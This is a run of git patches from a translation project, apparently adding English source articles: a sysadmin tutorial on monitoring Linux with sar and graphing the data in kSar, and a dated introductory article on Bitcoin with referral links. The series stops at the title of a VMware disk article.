From 3d8864a8a009ea35405a4ee8d875c65fb52208a0 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 09:47:42 +0800
Subject: [PATCH 125/371] PUB:20171214 How to Install Moodle on Ubuntu 16.04.md
@stevenzdg988 https://linux.cn/article-9211-1.html
---
.../20171214 How to Install Moodle on Ubuntu 16.04.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171214 How to Install Moodle on Ubuntu 16.04.md (100%)
diff --git a/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md b/published/20171214 How to Install Moodle on Ubuntu 16.04.md
similarity index 100%
rename from translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
rename to published/20171214 How to Install Moodle on Ubuntu 16.04.md
From 7e1e6aee341eb90f32d63b6678b40093262cca62 Mon Sep 17 00:00:00 2001
From: datastruct
Date: Sun, 7 Jan 2018 11:24:59 +0800
Subject: [PATCH 126/371] Update 20171228 Dual Boot Ubuntu And Arch Linux.md
---
sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md b/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
index 6a9091befa..adff25c6b6 100644
--- a/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
+++ b/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
@@ -1,3 +1,5 @@
+Translating by stevenzdg988
+
Dual Boot Ubuntu And Arch Linux
======
![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dual-boot-ubuntu-and-arch-linux_orig.jpg)
From 2039f034ccd052d47ceeae18e4f738b8ab5c02b5 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 12:26:26 +0800
Subject: [PATCH 127/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Create?=
=?UTF-8?q?=20sar=20Graphs=20With=20kSar=20To=20Identifying=20Linux=20Bott?=
=?UTF-8?q?lenecks?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...h kSar To Identifying Linux Bottlenecks.md | 340 ++++++++++++++++++
1 file changed, 340 insertions(+)
create mode 100644 sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md
diff --git a/sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md b/sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md
new file mode 100644
index 0000000000..6548a4a036
--- /dev/null
+++ b/sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md
@@ -0,0 +1,340 @@
+How To Create sar Graphs With kSar To Identifying Linux Bottlenecks
+======
+The sar command collects, reports, or saves UNIX / Linux system activity information. It will save selected counters in the operating system to the /var/log/sa/sadd file. From the collected data, you get lots of information about your server:
+
+ 1. CPU utilization
+ 2. Memory paging and its utilization
+ 3. Network I/O, and transfer statistics
+ 4. Process creation activity
+ 5. All block devices activity
+ 6. Interrupts/sec etc.
+
+
+
+The sar command output can be used for identifying server bottlenecks. However, analyzing the information provided by sar can be difficult, so use the kSar tool. kSar takes sar command output and plots a nice, easy-to-understand graph over a period of time.
+
+
+## sysstat Package
+
+The sar, sa1, and sa2 commands are part of the sysstat package. This collection of performance monitoring tools for Linux includes:
+
+ 1. sar : Displays the data.
+ 2. sa1 and sa2: Collect and store the data for later analysis. The sa2 shell script writes a daily report in the /var/log/sa directory, and the sa1 shell script collects and stores binary data in the system activity daily data file (see the example after this list).
+ 3. sadc - System activity data collector. You can configure various options by modifying the sa1 and sa2 scripts. They are located at the following locations:
+ * /usr/lib64/sa/sa1 (64bit) or /usr/lib/sa/sa1 (32bit) - This calls sadc to log reports to /var/log/sa/sadX format.
+ * /usr/lib64/sa/sa2 (64bit) or /usr/lib/sa/sa2 (32bit) - This calls sar to log reports to /var/log/sa/sarX format.
+
+
+
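+For a concrete look at what sa1/sadc produce, here is a small sketch; the day number `05` is only an example, so use whatever daily files exist on your system:
+
+```
+# list the binary daily data files written by sa1/sadc
+ls /var/log/sa/
+# read CPU utilization back out of one day's binary file
+sar -u -f /var/log/sa/sa05
+```
+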
+### How do I install sar on my system?
+
+Type the following [yum command][1] to install sysstat on a CentOS/RHEL based system:
+`# yum install sysstat`
+Sample outputs:
+```
+Loaded plugins: downloadonly, fastestmirror, priorities,
+ : protectbase, security
+Loading mirror speeds from cached hostfile
+ * addons: mirror.cs.vt.edu
+ * base: mirror.ash.fastserv.com
+ * epel: serverbeach1.fedoraproject.org
+ * extras: mirror.cogentco.com
+ * updates: centos.mirror.nac.net
+0 packages excluded due to repository protections
+Setting up Install Process
+Resolving Dependencies
+--> Running transaction check
+---> Package sysstat.x86_64 0:7.0.2-3.el5 set to be updated
+--> Finished Dependency Resolution
+
+Dependencies Resolved
+
+====================================================================
+ Package Arch Version Repository Size
+====================================================================
+Installing:
+ sysstat x86_64 7.0.2-3.el5 base 173 k
+
+Transaction Summary
+====================================================================
+Install 1 Package(s)
+Update 0 Package(s)
+Remove 0 Package(s)
+
+Total download size: 173 k
+Is this ok [y/N]: y
+Downloading Packages:
+sysstat-7.0.2-3.el5.x86_64.rpm | 173 kB 00:00
+Running rpm_check_debug
+Running Transaction Test
+Finished Transaction Test
+Transaction Test Succeeded
+Running Transaction
+ Installing : sysstat 1/1
+
+Installed:
+ sysstat.x86_64 0:7.0.2-3.el5
+
+Complete!
+```
+
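+The steps above target CentOS/RHEL. If you are on Debian or Ubuntu instead, a minimal sketch (assuming the stock sysstat package, which ships with data collection disabled by default) looks like this:
+
+```
+# install the same sysstat tool set from the distribution repositories
+sudo apt-get install sysstat
+# enable the data collector (off by default on Debian/Ubuntu)
+sudo sed -i 's/ENABLED="false"/ENABLED="true"/' /etc/default/sysstat
+sudo service sysstat restart
+```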
+
+### Configuration files for sysstat
+
+Edit the /etc/sysconfig/sysstat file to specify how long to keep log files, in days; the maximum is a month:
+`# vi /etc/sysconfig/sysstat`
+Sample outputs:
+```
+# keep log for 28 days
+# the default is 7
+HISTORY=28
+```
+
+Save and close the file.
+
+### Find the default cron job for sar
+
+[The default cron job is located][2] at /etc/cron.d/sysstat:
+`# cat /etc/cron.d/sysstat`
+Sample outputs:
+```
+# run system activity accounting tool every 10 minutes
+*/10 * * * * root /usr/lib64/sa/sa1 1 1
+# generate a daily summary of process accounting at 23:53
+53 23 * * * root /usr/lib64/sa/sa2 -A
+```
+
+### Tell sadc to report statistics for disks
+
+Edit the /etc/cron.d/sysstat file using a text editor such as vim, and enter:
+`# vi /etc/cron.d/sysstat`
+Update it as follows to log all disk stats (the -d option forces logging of stats for each block device and the -I option forces reporting of statistics for all system interrupts):
+```
+# run system activity accounting tool every 10 minutes
+*/10 * * * * root /usr/lib64/sa/sa1 -I -d 1 1
+# generate a daily summary of process accounting at 23:53
+53 23 * * * root /usr/lib64/sa/sa2 -A
+```
+
+On a CentOS/RHEL 7.x you need to pass the -S DISK option to collect data for block devices. Pass the -S XALL to collect data about:
+
+ 1. Disk
+ 2. Partition
+ 3. System interrupts
+ 4. SNMP
+ 5. IPv6
+
+
+```
+# Run system activity accounting tool every 10 minutes
+*/10 * * * * root /usr/lib64/sa/sa1 -S DISK 1 1
+# 0 * * * * root /usr/lib64/sa/sa1 600 6 &
+# Generate a daily summary of process accounting at 23:53
+53 23 * * * root /usr/lib64/sa/sa2 -A
+# Run system activity accounting tool every 10 minutes
+```
+
+Save and close the file. To turn on the service for CentOS/RHEL version 5.x/6.x, enter:
+`# chkconfig sysstat on
+# service sysstat start`
+Sample outputs:
+```
+Calling the system activity data collector (sadc):
+```
+
+For a CentOS/RHEL 7.x, run the following commands:
+```
+# systemctl enable sysstat
+# systemctl start sysstat.service
+# systemctl status sysstat.service
+```
+Sample outputs:
+```
+● sysstat.service - Resets System Activity Logs
+ Loaded: loaded (/usr/lib/systemd/system/sysstat.service; enabled; vendor preset: enabled)
+ Active: active (exited) since Sat 2018-01-06 16:33:19 IST; 3s ago
+ Process: 28297 ExecStart=/usr/lib64/sa/sa1 --boot (code=exited, status=0/SUCCESS)
+ Main PID: 28297 (code=exited, status=0/SUCCESS)
+
+Jan 06 16:33:19 centos7-box systemd[1]: Starting Resets System Activity Logs...
+Jan 06 16:33:19 centos7-box systemd[1]: Started Resets System Activity Logs.
+```
+
+## How Do I Use sar? How do I View Stats?
+
+Use the sar command to display the contents of selected cumulative activity counters in the operating system. In this example, sar is run to get real-time reporting from the command line about CPU utilization:
+`# sar -u 3 10`
+Sample outputs:
+```
+Linux 2.6.18-164.2.1.el5 (www-03.nixcraft.in) 12/14/2009
+
+09:49:47 PM CPU %user %nice %system %iowait %steal %idle
+09:49:50 PM all 5.66 0.00 1.22 0.04 0.00 93.08
+09:49:53 PM all 12.29 0.00 1.93 0.04 0.00 85.74
+09:49:56 PM all 9.30 0.00 1.61 0.00 0.00 89.10
+09:49:59 PM all 10.86 0.00 1.51 0.04 0.00 87.58
+09:50:02 PM all 14.21 0.00 3.27 0.04 0.00 82.47
+09:50:05 PM all 13.98 0.00 4.04 0.04 0.00 81.93
+09:50:08 PM all 6.60 6.89 1.26 0.00 0.00 85.25
+09:50:11 PM all 7.25 0.00 1.55 0.04 0.00 91.15
+09:50:14 PM all 6.61 0.00 1.09 0.00 0.00 92.31
+09:50:17 PM all 5.71 0.00 0.96 0.00 0.00 93.33
+Average: all 9.24 0.69 1.84 0.03 0.00 88.20
+```
+
+Where,
+
+ * 3 = interval
+ * 10 = count
+
+
+
+To view process creation statistics, enter:
+`# sar -c 3 10`
+To view I/O and transfer rate statistics, enter:
+`# sar -b 3 10`
+To view paging statistics, enter:
+`# sar -B 3 10`
+To view block device statistics, enter:
+`# sar -d 3 10`
+To view statistics for all interrupt statistics, enter:
+`# sar -I XALL 3 10`
+To view device specific network statistics, enter:
+```
+# sar -n DEV 3 10
+# sar -n EDEV 3 10
+```
+To view CPU specific statistics, enter:
+```
+# sar -P ALL
+# Only 1st CPU stats
+# sar -P 1 3 10
+```
+To view queue length and load averages statistics, enter:
+`# sar -q 3 10`
+To view memory and swap space utilization statistics, enter:
+```
+# sar -r 3 10
+# sar -R 3 10
+```
+To view status of inode, file and other kernel tables statistics, enter:
+`# sar -v 3 10`
+To view system switching activity statistics, enter:
+`# sar -w 3 10`
+To view swapping statistics, enter:
+`# sar -W 3 10`
+To view statistics for a given process called Apache with PID # 3256, enter:
+`# sar -x 3256 3 10`
+
+## Say Hello To kSar
+
+sar and sadf provide CLI-based output. The output may confuse new users and sysadmins, so you should use kSar, which is a Java application that graphs your sar data. It also permits exporting data to PDF/JPG/PNG/CSV. You can load data in three ways: from a local file, from local command execution, or from remote command execution via SSH. kSar supports the sar output of the following OSes:
+
+ 1. Solaris 8, 9 and 10
+ 2. Mac OS/X 10.4+
+ 3. Linux (Sysstat Version >= 5.0.5)
+ 4. AIX (4.3 & 5.3)
+ 5. HPUX 11.00+
+
+
+
+### Download And Install kSar
+
+Visit the [official][3] website and grab the latest source code. Use [wget][4] to download the source code, enter:
+`$ wget https://github.com/vlsi/ksar/releases/download/v5.2.4-snapshot-652bf16/ksar-5.2.4-SNAPSHOT-all.jar`
+
+#### How Do I Run kSar?
+
+Make sure the [Java JDK][5] is installed and working correctly. Type the following command to start kSar:
+`$ java -jar ksar-5.2.4-SNAPSHOT-all.jar`
+
+![Fig.01: kSar welcome screen][6]
+Next you will see main kSar window, and menus with two panels.
+![Fig.02: kSar - the main window][7]
+The left one will have a list of graphs available depending on the data kSar has parsed. The right window will show you the graph you have selected.
+
+## How Do I Generate sar Graphs Using kSar?
+
+First, you need to grab sar command statistics from the server named server1. Type the following command to get the stats:
+`[ **server1** ]# LC_ALL=C sar -A > /tmp/sar.data.txt`
+Next, copy the file to your local desktop from the remote box using the scp command:
+`[ **desktop** ]$ scp user@server1.nixcraft.com:/tmp/sar.data.txt /tmp/`
+Switch to the kSar window. Click on **Data** > **Load data from text file** > Select sar.data.txt from /tmp/ > Click the **Open** button.
+Now, the graph type tree is displayed in the left pane and a graph has been selected:
+![Fig.03: Processes for server1][8]
+
+![Fig.03: Disk stats \(blok device\) stats for server1][9]![Fig.05: Memory stats for server1][10]
+
+#### Zoom in and out
+
+Using the mouse, you can interactively zoom in on a part of a graph. To select a zone to zoom, click on the upper-left corner and, while still holding the mouse button, move to the lower-right corner of the zone you want to zoom. To return to the unzoomed view, click and drag the mouse to any corner location except the lower-right one. You can also right-click and select zoom options.
+
+#### Understanding kSar Graphs And sar Data
+
+I strongly recommend reading the sar and sadf command man pages:
+`$ man sar
+$ man sadf`
+
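+If you just want the raw numbers outside of kSar, the sadf command can also dump sar data in a machine-readable form; a small sketch (the file name sa05 and the output name cpu.csv are examples):
+
+```
+# export CPU utilization from one daily data file as semicolon-separated values
+sadf -d /var/log/sa/sa05 -- -u > cpu.csv
+```
+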
+## Case Study: Identifying Linux Server CPU Bottlenecks
+
+With the sar command and kSar tool, one can get a detailed snapshot of memory, CPU, and other subsystems. For example, if CPU utilization is more than 80% for a long period, a CPU bottleneck is most likely occurring. Using **sar -x ALL** you can find out which processes are eating CPU. The output of the [mpstat command][11] (part of the sysstat package itself) will also help you understand CPU utilization. You can easily analyze this information with kSar.
+
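+A rough command-line sketch of such a check (the interval and count values are arbitrary examples):
+
+```
+# per-CPU utilization, 5 samples at 3-second intervals
+mpstat -P ALL 3 5
+# list the processes currently using the most CPU
+ps -eo pid,comm,%cpu --sort=-%cpu | head -n 10
+```
+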
+### I Found CPU Bottlenecks…
+
+Performance tuning options for the CPU are as follows:
+
+ 1. Make sure that no unnecessary programs are running in the background. Turn off [all unnecessary services on Linux][12].
+ 2. Use [cron to schedule][13] jobs (e.g., backup) to run at off-peak hours.
+ 3. Use the [top and ps commands][14] to find out all non-critical background jobs / services. Make sure you lower their priority using the [renice command][15].
+ 4. Use the [taskset command to set a process's][16] CPU affinity (offload CPU), i.e. bind processes to different CPUs. For example, run the MySQL database on CPU #2 and Apache on CPU #3 (see the sketch after this list).
+ 5. Make sure you are using latest drivers and firmware for your server.
+ 6. If possible add additional CPUs to the system.
+ 7. Use faster CPUs for a single-threaded application (e.g. Lighttpd web server app).
+ 8. Use more CPUs for a multi-threaded application (e.g. MySQL database server app).
+ 9. Use more computer nodes and set up a [load balancer][17] for a web app.
+
+
+
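+As a small illustration of items 3 and 4 above (the PID values and the CPU number are made-up examples):
+
+```
+# lower the priority of a non-critical background job (PID 1234 is hypothetical)
+renice +10 -p 1234
+# pin an existing process (PID 5678, hypothetical) to CPU #2 only
+taskset -cp 2 5678
+```
+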
+## isag - Interactive System Activity Grapher (alternate tool)
+
+The isag command graphically displays the system activity data stored in a binary data file by a previous sar run. The isag command invokes sar to extract the data to be plotted. isag has a limited set of options compared to kSar.
+
+![Fig.06: isag CPU utilization graphs][18]
+
+
+### about the author
+
+The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][19], [Facebook][20], [Google+][21].
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/tips/identifying-linux-bottlenecks-sar-graphs-with-ksar.html
+
+作者:[Vivek Gite][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
+[2]:https://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
+[3]:https://github.com/vlsi/ksar
+[4]://www.cyberciti.biz/tips/linux-wget-your-ultimate-command-line-downloader.html
+[5]://www.cyberciti.biz/faq/howto-ubuntu-linux-install-configure-jdk-jre/
+[6]:https://www.cyberciti.biz/media/new/tips/2009/12/sar-welcome.png (kSar welcome screen)
+[7]:https://www.cyberciti.biz/media/new/tips/2009/12/screenshot-kSar-a-sar-grapher-01.png (kSar - the main window)
+[8]:https://www.cyberciti.biz/media/new/tips/2009/12/cpu-ksar.png (Linux kSar Processes for server1 )
+[9]:https://www.cyberciti.biz/media/new/tips/2009/12/disk-stats-ksar.png (Linux Disk I/O Stats Using kSar)
+[10]:https://www.cyberciti.biz/media/new/tips/2009/12/memory-ksar.png (Linux Memory paging and its utilization stats)
+[11]://www.cyberciti.biz/tips/how-do-i-find-out-linux-cpu-utilization.html
+[12]://www.cyberciti.biz/faq/check-running-services-in-rhel-redhat-fedora-centoslinux/
+[13]://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
+[14]://www.cyberciti.biz/faq/show-all-running-processes-in-linux/
+[15]://www.cyberciti.biz/faq/howto-change-unix-linux-process-priority/
+[16]://www.cyberciti.biz/faq/taskset-cpu-affinity-command/
+[17]://www.cyberciti.biz/tips/load-balancer-open-source-software.html
+[18]:https://www.cyberciti.biz/media/new/tips/2009/12/isag.cpu_.png (Fig.06: isag CPU utilization graphs)
+[19]:https://twitter.com/nixcraft
+[20]:https://facebook.com/nixcraft
+[21]:https://plus.google.com/+CybercitiBiz
From a07efa1781ba2061f4e462ac4b632dc05128fa04 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 12:27:31 +0800
Subject: [PATCH 128/371] add done: 20091215 How To Create sar Graphs With kSar
To Identifying Linux Bottlenecks.md
---
...h kSar To Identifying Linux Bottlenecks.md | 20 +++++++++----------
1 file changed, 10 insertions(+), 10 deletions(-)
diff --git a/sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md b/sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md
index 6548a4a036..0a35ec755d 100644
--- a/sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md
+++ b/sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md
@@ -317,23 +317,23 @@ via: https://www.cyberciti.biz/tips/identifying-linux-bottlenecks-sar-graphs-wit
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]:https://www.cyberciti.biz
-[1]://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
+[1]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
[2]:https://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
[3]:https://github.com/vlsi/ksar
-[4]://www.cyberciti.biz/tips/linux-wget-your-ultimate-command-line-downloader.html
-[5]://www.cyberciti.biz/faq/howto-ubuntu-linux-install-configure-jdk-jre/
+[4]:https://www.cyberciti.biz/tips/linux-wget-your-ultimate-command-line-downloader.html
+[5]:https://www.cyberciti.biz/faq/howto-ubuntu-linux-install-configure-jdk-jre/
[6]:https://www.cyberciti.biz/media/new/tips/2009/12/sar-welcome.png (kSar welcome screen)
[7]:https://www.cyberciti.biz/media/new/tips/2009/12/screenshot-kSar-a-sar-grapher-01.png (kSar - the main window)
[8]:https://www.cyberciti.biz/media/new/tips/2009/12/cpu-ksar.png (Linux kSar Processes for server1 )
[9]:https://www.cyberciti.biz/media/new/tips/2009/12/disk-stats-ksar.png (Linux Disk I/O Stats Using kSar)
[10]:https://www.cyberciti.biz/media/new/tips/2009/12/memory-ksar.png (Linux Memory paging and its utilization stats)
-[11]://www.cyberciti.biz/tips/how-do-i-find-out-linux-cpu-utilization.html
-[12]://www.cyberciti.biz/faq/check-running-services-in-rhel-redhat-fedora-centoslinux/
-[13]://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
-[14]://www.cyberciti.biz/faq/show-all-running-processes-in-linux/
-[15]://www.cyberciti.biz/faq/howto-change-unix-linux-process-priority/
-[16]://www.cyberciti.biz/faq/taskset-cpu-affinity-command/
-[17]://www.cyberciti.biz/tips/load-balancer-open-source-software.html
+[11]:https://www.cyberciti.biz/tips/how-do-i-find-out-linux-cpu-utilization.html
+[12]:https://www.cyberciti.biz/faq/check-running-services-in-rhel-redhat-fedora-centoslinux/
+[13]:https://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
+[14]:https://www.cyberciti.biz/faq/show-all-running-processes-in-linux/
+[15]:https://www.cyberciti.biz/faq/howto-change-unix-linux-process-priority/
+[16]:https://www.cyberciti.biz/faq/taskset-cpu-affinity-command/
+[17]:https://www.cyberciti.biz/tips/load-balancer-open-source-software.html
[18]:https://www.cyberciti.biz/media/new/tips/2009/12/isag.cpu_.png (Fig.06: isag CPU utilization graphs)
[19]:https://twitter.com/nixcraft
[20]:https://facebook.com/nixcraft
From 182c488f224d5560d3a40e3d971735fbf8e8494e Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 12:39:01 +0800
Subject: [PATCH 129/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20What=20Are=20Bitc?=
=?UTF-8?q?oins=3F?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20170919 What Are Bitcoins.md | 134 +++++++++++++++++++++
1 file changed, 134 insertions(+)
create mode 100644 sources/tech/20170919 What Are Bitcoins.md
diff --git a/sources/tech/20170919 What Are Bitcoins.md b/sources/tech/20170919 What Are Bitcoins.md
new file mode 100644
index 0000000000..3bc805e198
--- /dev/null
+++ b/sources/tech/20170919 What Are Bitcoins.md
@@ -0,0 +1,134 @@
+What Are Bitcoins?
+======
+![what are bitcoins](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/what-are-bitcoins_orig.jpg)
+
+ **[Bitcoin][1]** is a digital currency or electronic cash that relies on peer-to-peer technology for completing transactions. Since peer-to-peer technology is used as the major network, bitcoins provide a community-managed economy. That is to say, bitcoins eliminate the centralized-authority way of managing currency and promote community management of currency. Also, most of the software related to bitcoin mining and managing of bitcoin digital cash is open source.
+
+The first Bitcoin software was developed by Satoshi Nakamoto and is based on an open source cryptographic protocol. Bitcoin's smallest unit is known as the satoshi, which is basically one hundred-millionth of a single bitcoin (0.00000001 BTC).
+
+One cannot underestimate the boundaries BITCOINS eliminate in the digital economy. For instance, the BITCOIN eliminates control over currency by a centralised agency and offers control and management to the community as a whole. Furthermore, the fact that the BITCOIN is based on an open source cryptographic protocol makes it an open place subject to activities such as fluctuating value, deflation and inflation, among others. While many internet users are becoming aware of the privacy they should exercise to complete some online transactions, bitcoin is gaining more popularity than ever before. However, those who know about the dark web and how it works can acknowledge that some people began using it long ago.
+
+On the downside, bitcoin is also very secure for making anonymous payments, which may be a threat to security or personal health. For instance, the dark web markets are the major suppliers and retailers of imported drugs and even weapons. The use of BITCOINs on the dark web facilitates a safe network for such criminal activities. Despite that, if put to good use, bitcoin has many benefits that can eliminate some of the economic fallacies that result from centralized agency management of currency. In addition, bitcoin allows for instant exchange of cash anywhere in the world. The use of bitcoins also mitigates counterfeiting, printing, or devaluation over time. Also, by relying on a peer-to-peer network as its backbone, it promotes distributed authority over transaction records, making it safe to make exchanges.
+
+Other advantages of the bitcoin include;
+
+* In the online business world, bitcoin promotes money security and total control. This is because buyers are protected against merchants who may want to charge extra for a lower-cost service. The buyer can also choose not to share personal information after making a transaction. Besides, identity theft protection is achieved by keeping personal information hidden.
+
+* Bitcoins provide alternatives to common currency catastrophes such as getting lost, frozen or damaged. However, it is recommended to always make a backup of your bitcoins and encrypt them with a password.
+
+* In making online purchases and payments using bitcoins, there is a small fee or zero transaction fee charged. This promotes affordability of use.
+
+* Merchants also face fewer risks that could result from fraud as bitcoin transactions cannot be reversed, unlike other currencies in electronic form. Bitcoins also prove useful even in moments of high crime rate and fraud since it is difficult to con someone over an open public ledger (Blockchain).
+
+* Bitcoin currency is also hard to manipulate as it is open source and the cryptographic protocol is very secure.
+
+* Transactions can also be verified and approved, anywhere, anytime. This is the level of flexibility offered by this digital currency.
+
+Also Read - [Bitkey A Linux Distribution Dedicated To Bitcoin Transactions][2]
+
+### How To Mine Bitcoins and The Applications to Accomplish Necessary Bitcoin Management Tasks
+
+In the digital currency world, BITCOIN mining and management requires additional software. There are numerous open source bitcoin management applications that make it easy to make payments, receive payments, and encrypt and back up your bitcoins, as well as bitcoin mining software. There are sites such as [Freebitcoin][4], where one earns free bitcoins by viewing ads, and [MoonBitcoin][5], another site that one can sign up to for free and earn bitcoins. However, it is convenient if one has spare time and a sizable network of friends participating in the same. There are many sites offering bitcoin mining and one can easily sign up and start mining. One of the major secrets is referring as many people as you can to create a large network.
+
+Applications required for use with bitcoins include the bitcoin wallet, which allows one to safely keep bitcoins. This is just like the physical wallet used to keep hard cash, but in digital form. The wallet can be downloaded here - [Bitcoin - Wallet][6]. Other similar applications include [Blockchain][7], which works similar to the Bitcoin Wallet.
+
+The screenshots below show the Freebitco and MoonBitco mining sites respectively.
+
+ [![freebitco bitcoin mining site](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/freebitco-bitcoin-mining-site_orig.jpg)][8] [![moonbitcoin bitcoin mining site](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/moonbitcoin-bitcoin-mining-site_orig.png)][9]
+
+There are various ways of acquiring the bitcoin currency. Some of them include the use of bitcoin mining rigs, purchasing bitcoins in exchange markets, and doing free bitcoin mining online. Purchasing of bitcoins can be done at [MtGox][10], [bitNZ][11], [Bitstamp][12], [BTC-E][13], [VertEx][14], etc. Several open source mining applications are available online; these include Bitminter, [5OMiner][15] and [BFG Miner][16], among others. These applications make use of some graphics card and processor features to generate bitcoins. The efficiency of mining bitcoins on a PC largely depends on the type of graphics card and the processor of the mining rig.
+
+Besides, there are many secure online storages for backing up bitcoins. These sites provide bitcoin storage services free of charge. Examples of bitcoin managing sites include [xapo][17] and [BlockChain][18]. Signing up on these sites requires a valid email and phone number for verification. Xapo offers additional security through its phone application by requesting verification whenever a new sign-in is made.
+
+### Disadvantages Of Bitcoins
+
+The numerous advantages reaped from using the bitcoin digital currency cannot be overlooked. However, as it is still in its infancy, the bitcoin currency meets several points of resistance. For instance, the majority of individuals are not fully aware of the bitcoin digital currency and how it works. The lack of awareness can be mitigated through education and creation of awareness. Bitcoin users also face volatility, as the demand for bitcoins is higher than the available amount of coins. However, given more time, volatility will be lowered as more people start using bitcoins.
+
+### Improvements Can be Made
+
+Based on the infancy of the [bitcoin technology][19], there is still room for changes to make it more secure and reliable. Given more time, the bitcoin currency will be developed enough to provide flexibility as a common currency. For the bitcoin to succeed, many people need to be made aware of it, besides being given information on how it works and its benefits.
+
+--------------------------------------------------------------------------------
+
+via: http://www.linuxandubuntu.com/home/things-you-need-to-know-about-bitcoins
+
+作者:[LINUXANDUBUNTU][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.linuxandubuntu.com/
+[1]:http://www.linuxandubuntu.com/home/bitkey-a-linux-distribution-dedicated-for-conducting-bitcoin-transactions
+[2]:http://www.linuxandubuntu.com/home/bitkey-a-linux-distribution-dedicated-for-conducting-bitcoin-transactions
+[3]:http://www.linuxandubuntu.com/home/things-you-need-to-know-about-bitcoins
+[4]:https://freebitco.in/?r=2167375
+[5]:http://moonbit.co.in/?ref=c637809a5051
+[6]:https://bitcoin.org/en/choose-your-wallet
+[7]:https://blockchain.info/wallet/
+[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/freebitco-bitcoin-mining-site_orig.jpg
+[9]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/moonbitcoin-bitcoin-mining-site_orig.png
+[10]:http://mtgox.com/
+[11]:https://en.bitcoin.it/wiki/BitNZ
+[12]:https://www.bitstamp.net/
+[13]:https://btc-e.com/
+[14]:https://www.vertexinc.com/
+[15]:https://www.downloadcloud.com/bitcoin-miner-software.html
+[16]:https://github.com/luke-jr/bfgminer
+[17]:https://xapo.com/
+[18]:https://www.blockchain.com/
+[19]:https://en.wikipedia.org/wiki/Bitcoin
From dc7a6d7e7bc46dc0817b3ef26be79c8da610ab84 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 12:57:19 +0800
Subject: [PATCH 130/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Vmware=20Linux=20?=
=?UTF-8?q?Guest=20Add=20a=20New=20Hard=20Disk=20Without=20Rebooting=20Gue?=
=?UTF-8?q?st?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...a New Hard Disk Without Rebooting Guest.md | 195 ++++++++++++++++++
1 file changed, 195 insertions(+)
create mode 100644 sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
diff --git a/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md b/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
new file mode 100644
index 0000000000..e0745af406
--- /dev/null
+++ b/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
@@ -0,0 +1,195 @@
+translating by lujun9972
+Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest
+======
